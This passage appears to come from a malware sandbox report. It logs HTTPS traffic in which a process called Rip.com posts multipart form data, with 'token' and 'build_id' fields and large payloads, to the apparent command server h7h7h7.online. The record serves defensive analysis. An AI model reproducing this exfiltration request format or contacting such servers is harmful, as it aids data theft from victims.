                                                                                                                                                                                                                                                                      2024-12-31 20:33:46 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 75 61 61 31 64 74 32 36 78 74 32 6e 79 75 73 32 6e 6f 70 7a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 38 32 36 38 30 62 30 39 33 36 32 31 38 61 36 30 66 66 36 34 37 66 30 62 39 63 38 35 64 62 0d 0a 2d 2d 2d 2d 2d 2d 75 61 61 31 64 74 32 36 78 74 32 6e 79 75 73 32 6e 6f 70 7a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 75 61 61 31 64 74 32 36 78 74 32 6e 79 75 73 32 6e 6f 70 7a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                      Data Ascii: ------uaa1dt26xt2nyus2nopzContent-Disposition: form-data; name="token"bc82680b0936218a60ff647f0b9c85db------uaa1dt26xt2nyus2nopzContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------uaa1dt26xt2nyus2nopzCont
                                                                                                                                                                                                                                                                      2024-12-31 20:33:46 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                      2024-12-31 20:33:46 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                      2024-12-31 20:33:46 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                      2024-12-31 20:33:46 UTC581OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                      2024-12-31 20:33:47 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                      Date: Tue, 31 Dec 2024 20:33:47 GMT
                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      2024-12-31 20:33:47 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      20192.168.2.449821116.203.13.1094437816C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-12-31 20:33:48 UTC281OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----3ekx4wtrie3wbaiwlf3o
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                      Host: h7h7h7.online
                                                                                                                                                                                                                                                                      Content-Length: 153381
                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                      2024-12-31 20:33:48 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 33 65 6b 78 34 77 74 72 69 65 33 77 62 61 69 77 6c 66 33 6f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 38 32 36 38 30 62 30 39 33 36 32 31 38 61 36 30 66 66 36 34 37 66 30 62 39 63 38 35 64 62 0d 0a 2d 2d 2d 2d 2d 2d 33 65 6b 78 34 77 74 72 69 65 33 77 62 61 69 77 6c 66 33 6f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 33 65 6b 78 34 77 74 72 69 65 33 77 62 61 69 77 6c 66 33 6f 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                      Data Ascii: ------3ekx4wtrie3wbaiwlf3oContent-Disposition: form-data; name="token"bc82680b0936218a60ff647f0b9c85db------3ekx4wtrie3wbaiwlf3oContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------3ekx4wtrie3wbaiwlf3oCont
                                                                                                                                                                                                                                                                      2024-12-31 20:33:48 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                      2024-12-31 20:33:48 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                      2024-12-31 20:33:48 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                      2024-12-31 20:33:48 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                      2024-12-31 20:33:48 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                      2024-12-31 20:33:48 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                      2024-12-31 20:33:48 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                      2024-12-31 20:33:48 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                      2024-12-31 20:33:48 UTC6186OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                      2024-12-31 20:33:49 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                      Date: Tue, 31 Dec 2024 20:33:49 GMT
                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                      Connection: close


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      21192.168.2.449822116.203.13.1094437816C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-12-31 20:33:49 UTC281OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----eu3w4o89zua1n7ym79rq
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                      Host: h7h7h7.online
                                                                                                                                                                                                                                                                      Content-Length: 393697
                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                      2024-12-31 20:33:49 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 65 75 33 77 34 6f 38 39 7a 75 61 31 6e 37 79 6d 37 39 72 71 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 38 32 36 38 30 62 30 39 33 36 32 31 38 61 36 30 66 66 36 34 37 66 30 62 39 63 38 35 64 62 0d 0a 2d 2d 2d 2d 2d 2d 65 75 33 77 34 6f 38 39 7a 75 61 31 6e 37 79 6d 37 39 72 71 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 65 75 33 77 34 6f 38 39 7a 75 61 31 6e 37 79 6d 37 39 72 71 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                      Data Ascii: ------eu3w4o89zua1n7ym79rqContent-Disposition: form-data; name="token"bc82680b0936218a60ff647f0b9c85db------eu3w4o89zua1n7ym79rqContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------eu3w4o89zua1n7ym79rqCont
